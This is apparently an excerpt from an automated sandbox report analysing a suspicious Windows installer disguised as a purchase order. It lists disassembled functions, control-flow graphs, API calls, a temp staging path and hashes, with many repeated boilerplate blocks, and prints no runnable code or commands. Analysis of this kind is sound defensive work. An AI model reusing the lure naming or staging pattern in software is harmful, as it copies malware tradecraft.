                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1857211195
                                                • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 772 402c4f-402c5e 758->772 759->772 779 401680-401683 759->779 763->764 768 401616-40161d call 405b0c 763->768 771 401631-401633 764->771 768->764 783 40161f-401627 call 405a95 768->783 775 401635-40163a 771->775 776 40164c-401654 771->776 780 401649 775->780 781 40163c-401647 GetFileAttributesW 775->781 776->755 776->756 779->772 780->776 781->776 781->780 783->771
                                                APIs
                                                  • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405EC9
                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                  • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels,?,00000000,000000F0), ref: 00401672
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels, xrefs: 00401665
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels
                                                • API String ID: 1892508949-2017472917
                                                • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 799 40742b-40743e 795->799 800 4073cd-4073ee 795->800 798 407313-40731a 796->798 797->798 803 407341 798->803 804 40731c-407320 798->804 805 407347-40734d 799->805 801 4073f0-407405 800->801 802 407407-40741a 800->802 806 40741d-407424 801->806 802->806 803->805 807 407326-40733e 804->807 808 4074cf-4074d9 804->808 810 406af2 805->810 811 4074fa 805->811 813 4073c4 806->813 814 407426 806->814 807->803 812 4074e5-4074f8 808->812 816 406af9-406afd 810->816 817 406c39-406c5a 810->817 818 406b9e-406ba2 810->818 819 406c0e-406c12 810->819 815 4074fd-407501 811->815 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->812 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->812 823->813 824->812 825->811 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->812 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->811 842 406b81 837->842 838->828 839->838 839->839 840->811 840->835 841->840 842->832
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: 32079
                                                • API String ID: 3394109436-2447952077
                                                • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                                • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                                Function 004024AF Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID:
                                                • API String ID: 2655323295-0
                                                • Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                • Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
